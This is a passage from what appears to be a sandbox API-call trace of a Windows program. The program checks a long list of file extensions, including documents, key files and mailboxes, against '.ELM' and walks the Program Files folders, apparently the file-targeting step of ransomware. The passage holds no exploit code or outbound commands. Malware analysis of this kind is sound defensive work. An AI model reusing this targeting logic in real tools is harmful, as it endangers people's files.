(lpString=".j2c") returned 4 [0036.603] lstrcmpiW (lpString1=".j2c", lpString2=".ELM") returned 1 [0036.603] lstrlenW (lpString=".j2k") returned 4 [0036.603] lstrcmpiW (lpString1=".j2k", lpString2=".ELM") returned 1 [0036.603] lstrlenW (lpString=".java") returned 5 [0036.603] lstrcmpiW (lpString1=".java", lpString2="N.ELM") returned -1 [0036.603] lstrlenW (lpString=".jp2") returned 4 [0036.603] lstrcmpiW (lpString1=".jp2", lpString2=".ELM") returned 1 [0036.603] lstrlenW (lpString=".jpc") returned 4 [0036.603] lstrcmpiW (lpString1=".jpc", lpString2=".ELM") returned 1 [0036.603] lstrlenW (lpString=".jpe") returned 4 [0036.603] lstrcmpiW (lpString1=".jpe", lpString2=".ELM") returned 1 [0036.603] lstrlenW (lpString=".jpeg") returned 5 [0036.603] lstrcmpiW (lpString1=".jpeg", lpString2="N.ELM") returned -1 [0036.603] lstrlenW (lpString=".jpf") returned 4 [0036.604] lstrcmpiW (lpString1=".jpf", lpString2=".ELM") returned 1 [0036.604] lstrlenW (lpString=".jpg") returned 4 [0036.604] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0036.604] lstrlenW (lpString=".jpx") returned 4 [0036.604] lstrcmpiW (lpString1=".jpx", lpString2=".ELM") returned 1 [0036.604] lstrlenW (lpString=".js") returned 3 [0036.604] lstrcmpiW (lpString1=".js", lpString2="ELM") returned -1 [0036.604] lstrlenW (lpString=".jsf") returned 4 [0036.604] lstrcmpiW (lpString1=".jsf", lpString2=".ELM") returned 1 [0036.604] lstrlenW (lpString=".json") returned 5 [0036.604] lstrcmpiW (lpString1=".json", lpString2="N.ELM") returned -1 [0036.604] lstrlenW (lpString=".jsp") returned 4 [0036.604] lstrcmpiW (lpString1=".jsp", lpString2=".ELM") returned 1 [0036.604] lstrlenW (lpString=".kdc") returned 4 [0036.604] lstrcmpiW (lpString1=".kdc", lpString2=".ELM") returned 1 [0036.604] lstrlenW (lpString=".kmz") returned 4 [0036.604] lstrcmpiW (lpString1=".kmz", lpString2=".ELM") returned 1 [0036.604] lstrlenW (lpString=".kwm") returned 4 [0036.604] lstrcmpiW (lpString1=".kwm", lpString2=".ELM") returned 1 [0036.604] lstrlenW (lpString=".lasso") returned 6 [0036.604] lstrcmpiW (lpString1=".lasso", lpString2="ON.ELM") returned -1 [0036.604] lstrlenW (lpString=".lbi") returned 4 [0036.604] lstrcmpiW (lpString1=".lbi", lpString2=".ELM") returned 1 [0036.604] lstrlenW (lpString=".lgf") returned 4 [0036.604] lstrcmpiW (lpString1=".lgf", lpString2=".ELM") returned 1 [0036.604] lstrlenW (lpString=".lgp") returned 4 [0036.604] lstrcmpiW (lpString1=".lgp", lpString2=".ELM") returned 1 [0036.604] lstrlenW (lpString=".log") returned 4 [0036.604] lstrcmpiW (lpString1=".log", lpString2=".ELM") returned 1 [0036.604] lstrlenW (lpString=".m1v") returned 4 [0036.604] lstrcmpiW (lpString1=".m1v", lpString2=".ELM") returned 1 [0036.604] lstrlenW (lpString=".m4a") returned 4 [0036.604] lstrcmpiW (lpString1=".m4a", lpString2=".ELM") returned 1 [0036.604] lstrlenW (lpString=".m4v") returned 4 [0036.604] lstrcmpiW (lpString1=".m4v", lpString2=".ELM") returned 1 [0036.605] lstrlenW (lpString=".max") returned 4 [0036.605] lstrcmpiW (lpString1=".max", lpString2=".ELM") returned 1 [0036.605] lstrlenW (lpString=".md") returned 3 [0036.605] lstrcmpiW (lpString1=".md", lpString2="ELM") returned -1 [0036.605] lstrlenW (lpString=".mda") returned 4 [0036.605] lstrcmpiW (lpString1=".mda", lpString2=".ELM") returned 1 [0036.605] lstrlenW (lpString=".mdb") returned 4 [0036.605] lstrcmpiW (lpString1=".mdb", lpString2=".ELM") returned 1 [0036.605] lstrlenW (lpString=".mde") returned 4 [0036.605] lstrcmpiW (lpString1=".mde", lpString2=".ELM") returned 1 [0036.605] lstrlenW (lpString=".mdf") returned 4 [0036.605] lstrcmpiW (lpString1=".mdf", lpString2=".ELM") returned 1 [0036.605] lstrlenW (lpString=".mdw") returned 4 [0036.605] lstrcmpiW (lpString1=".mdw", lpString2=".ELM") returned 1 [0036.605] lstrlenW (lpString=".mef") returned 4 [0036.605] lstrcmpiW (lpString1=".mef", lpString2=".ELM") returned 1 [0036.605] lstrlenW (lpString=".mft") returned 4 [0036.605] lstrcmpiW (lpString1=".mft", lpString2=".ELM") returned 1 [0036.605] lstrlenW (lpString=".mfw") returned 4 [0036.605] lstrcmpiW (lpString1=".mfw", lpString2=".ELM") returned 1 [0036.605] lstrlenW (lpString=".mht") returned 4 [0036.605] lstrcmpiW (lpString1=".mht", lpString2=".ELM") returned 1 [0036.605] lstrlenW (lpString=".mhtml") returned 6 [0036.605] lstrcmpiW (lpString1=".mhtml", lpString2="ON.ELM") returned -1 [0036.605] lstrlenW (lpString=".mka") returned 4 [0036.605] lstrcmpiW (lpString1=".mka", lpString2=".ELM") returned 1 [0036.605] lstrlenW (lpString=".mkidx") returned 6 [0036.605] lstrcmpiW (lpString1=".mkidx", lpString2="ON.ELM") returned -1 [0036.605] lstrlenW (lpString=".mkv") returned 4 [0036.605] lstrcmpiW (lpString1=".mkv", lpString2=".ELM") returned 1 [0036.605] lstrlenW (lpString=".mos") returned 4 [0036.605] lstrcmpiW (lpString1=".mos", lpString2=".ELM") returned 1 [0036.605] lstrlenW (lpString=".mov") returned 4 [0036.605] lstrcmpiW (lpString1=".mov", lpString2=".ELM") returned 1 [0036.605] lstrlenW (lpString=".mp3") returned 4 [0036.606] lstrcmpiW (lpString1=".mp3", lpString2=".ELM") returned 1 [0036.606] lstrlenW (lpString=".mp4") returned 4 [0036.606] lstrcmpiW (lpString1=".mp4", lpString2=".ELM") returned 1 [0036.606] lstrlenW (lpString=".mpeg") returned 5 [0036.606] lstrcmpiW (lpString1=".mpeg", lpString2="N.ELM") returned -1 [0036.606] lstrlenW (lpString=".mpg") returned 4 [0036.606] lstrcmpiW (lpString1=".mpg", lpString2=".ELM") returned 1 [0036.606] lstrlenW (lpString=".mpv") returned 4 [0036.606] lstrcmpiW (lpString1=".mpv", lpString2=".ELM") returned 1 [0036.606] lstrlenW (lpString=".mrw") returned 4 [0036.606] lstrcmpiW (lpString1=".mrw", lpString2=".ELM") returned 1 [0036.606] lstrlenW (lpString=".msg") returned 4 [0036.606] lstrcmpiW (lpString1=".msg", lpString2=".ELM") returned 1 [0036.606] lstrlenW (lpString=".mxl") returned 4 [0036.606] lstrcmpiW (lpString1=".mxl", lpString2=".ELM") returned 1 [0036.606] lstrlenW (lpString=".myd") returned 4 [0036.606] lstrcmpiW (lpString1=".myd", lpString2=".ELM") returned 1 [0036.606] lstrlenW (lpString=".myi") returned 4 [0036.606] lstrcmpiW (lpString1=".myi", lpString2=".ELM") returned 1 [0036.606] lstrlenW (lpString=".nef") returned 4 [0036.606] lstrcmpiW (lpString1=".nef", lpString2=".ELM") returned 1 [0036.606] lstrlenW (lpString=".nrw") returned 4 [0036.606] lstrcmpiW (lpString1=".nrw", lpString2=".ELM") returned 1 [0036.606] lstrlenW (lpString=".obj") returned 4 [0036.606] lstrcmpiW (lpString1=".obj", lpString2=".ELM") returned 1 [0036.606] lstrlenW (lpString=".odb") returned 4 [0036.606] lstrcmpiW (lpString1=".odb", lpString2=".ELM") returned 1 [0036.606] lstrlenW (lpString=".odc") returned 4 [0036.606] lstrcmpiW (lpString1=".odc", lpString2=".ELM") returned 1 [0036.606] lstrlenW (lpString=".odm") returned 4 [0036.606] lstrcmpiW (lpString1=".odm", lpString2=".ELM") returned 1 [0036.606] lstrlenW (lpString=".odp") returned 4 [0036.606] lstrcmpiW (lpString1=".odp", lpString2=".ELM") returned 1 [0036.606] lstrlenW (lpString=".ods") returned 4 [0036.606] lstrcmpiW (lpString1=".ods", lpString2=".ELM") returned 1 [0036.607] lstrlenW (lpString=".oft") returned 4 [0036.607] lstrcmpiW (lpString1=".oft", lpString2=".ELM") returned 1 [0036.607] lstrlenW (lpString=".one") returned 4 [0036.607] lstrcmpiW (lpString1=".one", lpString2=".ELM") returned 1 [0036.607] lstrlenW (lpString=".onepkg") returned 7 [0036.607] lstrcmpiW (lpString1=".onepkg", lpString2="OON.ELM") returned -1 [0036.607] lstrlenW (lpString=".onetoc2") returned 8 [0036.607] lstrcmpiW (lpString1=".onetoc2", lpString2="NOON.ELM") returned -1 [0036.607] lstrlenW (lpString=".opt") returned 4 [0036.607] lstrcmpiW (lpString1=".opt", lpString2=".ELM") returned 1 [0036.607] lstrlenW (lpString=".oqy") returned 4 [0036.607] lstrcmpiW (lpString1=".oqy", lpString2=".ELM") returned 1 [0036.607] lstrlenW (lpString=".orf") returned 4 [0036.607] lstrcmpiW (lpString1=".orf", lpString2=".ELM") returned 1 [0036.607] lstrlenW (lpString=".p12") returned 4 [0036.607] lstrcmpiW (lpString1=".p12", lpString2=".ELM") returned 1 [0036.607] lstrlenW (lpString=".p7b") returned 4 [0036.607] lstrcmpiW (lpString1=".p7b", lpString2=".ELM") returned 1 [0036.607] lstrlenW (lpString=".p7c") returned 4 [0036.607] lstrcmpiW (lpString1=".p7c", lpString2=".ELM") returned 1 [0036.607] lstrlenW (lpString=".pam") returned 4 [0036.607] lstrcmpiW (lpString1=".pam", lpString2=".ELM") returned 1 [0036.607] lstrlenW (lpString=".pbm") returned 4 [0036.607] lstrcmpiW (lpString1=".pbm", lpString2=".ELM") returned 1 [0036.607] lstrlenW (lpString=".pct") returned 4 [0036.607] lstrcmpiW (lpString1=".pct", lpString2=".ELM") returned 1 [0036.607] lstrlenW (lpString=".pcx") returned 4 [0036.607] lstrcmpiW (lpString1=".pcx", lpString2=".ELM") returned 1 [0036.607] lstrlenW (lpString=".pdd") returned 4 [0036.607] lstrcmpiW (lpString1=".pdd", lpString2=".ELM") returned 1 [0036.607] lstrlenW (lpString=".pdf") returned 4 [0036.607] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0036.607] lstrlenW (lpString=".pdp") returned 4 [0036.607] lstrcmpiW (lpString1=".pdp", lpString2=".ELM") returned 1 [0036.607] lstrlenW (lpString=".pef") returned 4 [0036.608] lstrcmpiW (lpString1=".pef", lpString2=".ELM") returned 1 [0036.608] lstrlenW (lpString=".pem") returned 4 [0036.608] lstrcmpiW (lpString1=".pem", lpString2=".ELM") returned 1 [0036.608] lstrlenW (lpString=".pff") returned 4 [0036.608] lstrcmpiW (lpString1=".pff", lpString2=".ELM") returned 1 [0036.608] lstrlenW (lpString=".pfm") returned 4 [0036.608] lstrcmpiW (lpString1=".pfm", lpString2=".ELM") returned 1 [0036.608] lstrlenW (lpString=".pfx") returned 4 [0036.608] lstrcmpiW (lpString1=".pfx", lpString2=".ELM") returned 1 [0036.608] lstrlenW (lpString=".pgm") returned 4 [0036.608] lstrcmpiW (lpString1=".pgm", lpString2=".ELM") returned 1 [0036.608] lstrlenW (lpString=".php") returned 4 [0036.608] lstrcmpiW (lpString1=".php", lpString2=".ELM") returned 1 [0036.608] lstrlenW (lpString=".php3") returned 5 [0036.608] lstrcmpiW (lpString1=".php3", lpString2="N.ELM") returned -1 [0036.608] lstrlenW (lpString=".php4") returned 5 [0036.608] lstrcmpiW (lpString1=".php4", lpString2="N.ELM") returned -1 [0036.608] lstrlenW (lpString=".php5") returned 5 [0036.608] lstrcmpiW (lpString1=".php5", lpString2="N.ELM") returned -1 [0036.608] lstrlenW (lpString=".phtml") returned 6 [0036.608] lstrcmpiW (lpString1=".phtml", lpString2="ON.ELM") returned -1 [0036.608] lstrlenW (lpString=".pict") returned 5 [0036.608] lstrcmpiW (lpString1=".pict", lpString2="N.ELM") returned -1 [0036.608] lstrlenW (lpString=".pl") returned 3 [0036.608] lstrcmpiW (lpString1=".pl", lpString2="ELM") returned -1 [0036.608] lstrlenW (lpString=".pls") returned 4 [0036.608] lstrcmpiW (lpString1=".pls", lpString2=".ELM") returned 1 [0036.608] lstrlenW (lpString=".pm") returned 3 [0036.608] lstrcmpiW (lpString1=".pm", lpString2="ELM") returned -1 [0036.608] lstrlenW (lpString=".png") returned 4 [0036.608] lstrcmpiW (lpString1=".png", lpString2=".ELM") returned 1 [0036.608] lstrlenW (lpString=".pnm") returned 4 [0036.608] lstrcmpiW (lpString1=".pnm", lpString2=".ELM") returned 1 [0036.608] lstrlenW (lpString=".pot") returned 4 [0036.608] lstrcmpiW (lpString1=".pot", lpString2=".ELM") returned 1 [0036.609] lstrlenW (lpString=".potm") returned 5 [0036.609] lstrcmpiW (lpString1=".potm", lpString2="N.ELM") returned -1 [0036.609] lstrlenW (lpString=".potx") returned 5 [0036.609] lstrcmpiW (lpString1=".potx", lpString2="N.ELM") returned -1 [0036.609] lstrlenW (lpString=".ppa") returned 4 [0036.609] lstrcmpiW (lpString1=".ppa", lpString2=".ELM") returned 1 [0036.609] lstrlenW (lpString=".ppam") returned 5 [0036.609] lstrcmpiW (lpString1=".ppam", lpString2="N.ELM") returned -1 [0036.609] lstrlenW (lpString=".ppm") returned 4 [0036.609] lstrcmpiW (lpString1=".ppm", lpString2=".ELM") returned 1 [0036.609] lstrlenW (lpString=".pps") returned 4 [0036.609] lstrcmpiW (lpString1=".pps", lpString2=".ELM") returned 1 [0036.609] lstrlenW (lpString=".ppsm") returned 5 [0036.609] lstrcmpiW (lpString1=".ppsm", lpString2="N.ELM") returned -1 [0036.609] lstrlenW (lpString=".ppt") returned 4 [0036.609] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0036.609] lstrlenW (lpString=".pptm") returned 5 [0036.609] lstrcmpiW (lpString1=".pptm", lpString2="N.ELM") returned -1 [0036.609] lstrlenW (lpString=".pptx") returned 5 [0036.609] lstrcmpiW (lpString1=".pptx", lpString2="N.ELM") returned -1 [0036.609] lstrlenW (lpString=".prn") returned 4 [0036.609] lstrcmpiW (lpString1=".prn", lpString2=".ELM") returned 1 [0036.609] lstrlenW (lpString=".ps") returned 3 [0036.609] lstrcmpiW (lpString1=".ps", lpString2="ELM") returned -1 [0036.609] lstrlenW (lpString=".psb") returned 4 [0036.609] lstrcmpiW (lpString1=".psb", lpString2=".ELM") returned 1 [0036.609] lstrlenW (lpString=".psd") returned 4 [0036.609] lstrcmpiW (lpString1=".psd", lpString2=".ELM") returned 1 [0036.609] lstrlenW (lpString=".pst") returned 4 [0036.609] lstrcmpiW (lpString1=".pst", lpString2=".ELM") returned 1 [0036.609] lstrlenW (lpString=".ptx") returned 4 [0036.609] lstrcmpiW (lpString1=".ptx", lpString2=".ELM") returned 1 [0036.609] lstrlenW (lpString=".pub") returned 4 [0036.609] lstrcmpiW (lpString1=".pub", lpString2=".ELM") returned 1 [0036.609] lstrlenW (lpString=".pwm") returned 4 [0036.610] lstrcmpiW (lpString1=".pwm", lpString2=".ELM") returned 1 [0036.610] lstrlenW (lpString=".pxr") returned 4 [0036.610] lstrcmpiW (lpString1=".pxr", lpString2=".ELM") returned 1 [0036.610] lstrlenW (lpString=".py") returned 3 [0036.610] lstrcmpiW (lpString1=".py", lpString2="ELM") returned -1 [0036.610] lstrlenW (lpString=".qt") returned 3 [0036.610] lstrcmpiW (lpString1=".qt", lpString2="ELM") returned -1 [0036.610] lstrlenW (lpString=".r3d") returned 4 [0036.610] lstrcmpiW (lpString1=".r3d", lpString2=".ELM") returned 1 [0038.838] FindClose (in: hFindFile=0x3ed1340 | out: hFindFile=0x3ed1340) returned 1 [0038.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0038.838] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee53867, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee53867, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5caa, dwReserved0=0x0, dwReserved1=0x0, cFileName="WhiteDot.png", cAlternateFileName="")) returned 1 [0038.838] FindClose (in: hFindFile=0x3ed12c0 | out: hFindFile=0x3ed12c0) returned 1 [0038.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37e0fa0 | out: hHeap=0x5f0000) returned 1 [0038.839] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9060745b, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x9060745b, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x4877fc17, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x379f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters.xml", cAlternateFileName="")) returned 1 [0038.839] FindClose (in: hFindFile=0x3ed1200 | out: hFindFile=0x3ed1200) returned 1 [0038.839] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ef2078 | out: hHeap=0x5f0000) returned 1 [0038.839] FindNextFileW (in: hFindFile=0x3ed11c0, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x13600, dwReserved0=0x0, dwReserved1=0x0, cFileName="soniccolorconverter.ax", cAlternateFileName="")) returned 1 [0038.839] FindClose (in: hFindFile=0x3ed11c0 | out: hFindFile=0x3ed11c0) returned 1 [0038.839] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ee2070 | out: hHeap=0x5f0000) returned 1 [0038.839] FindNextFileW (in: hFindFile=0x3ed1080, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0038.840] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed11c0 [0038.840] FindNextFileW (in: hFindFile=0x3ed11c0, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.840] FindNextFileW (in: hFindFile=0x3ed11c0, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0038.840] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\*", lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1200 [0038.841] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.841] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll.mui", cAlternateFileName="")) returned 1 [0038.841] FindClose (in: hFindFile=0x3ed1200 | out: hFindFile=0x3ed1200) returned 1 [0038.842] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ec0058 | out: hHeap=0x5f0000) returned 1 [0038.842] FindNextFileW (in: hFindFile=0x3ed11c0, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f55643f, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x5f55643f, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x23ff2d20, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xce00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll", cAlternateFileName="")) returned 1 [0038.854] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\*", lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x98d1a336, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98d1a336, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1200 [0038.854] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x98d1a336, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98d1a336, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.854] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80471418, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf22307c6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf22307c6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="install.ins", cAlternateFileName="")) returned 1 [0038.854] FindClose (in: hFindFile=0x3ed1200 | out: hFindFile=0x3ed1200) returned 1 [0038.854] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ec0058 | out: hHeap=0x5f0000) returned 1 [0038.854] FindNextFileW (in: hFindFile=0x3ed11c0, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x855fc7e1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x855fc7e1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85622942, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0038.854] FindClose (in: hFindFile=0x3ed11c0 | out: hFindFile=0x3ed11c0) returned 1 [0038.854] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0038.854] FindNextFileW (in: hFindFile=0x3ed1080, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa4b74600, ftLastAccessTime.dwHighDateTime=0x1d5246c, ftLastWriteTime.dwLowDateTime=0xa4b74600, ftLastWriteTime.dwHighDateTime=0x1d5246c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0038.855] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa4b74600, ftLastAccessTime.dwHighDateTime=0x1d5246c, ftLastWriteTime.dwLowDateTime=0xa4b74600, ftLastWriteTime.dwHighDateTime=0x1d5246c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed11c0 [0038.855] FindNextFileW (in: hFindFile=0x3ed11c0, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa4b74600, ftLastAccessTime.dwHighDateTime=0x1d5246c, ftLastWriteTime.dwLowDateTime=0xa4b74600, ftLastWriteTime.dwHighDateTime=0x1d5246c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.855] FindNextFileW (in: hFindFile=0x3ed11c0, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 1 [0038.855] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*", lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, 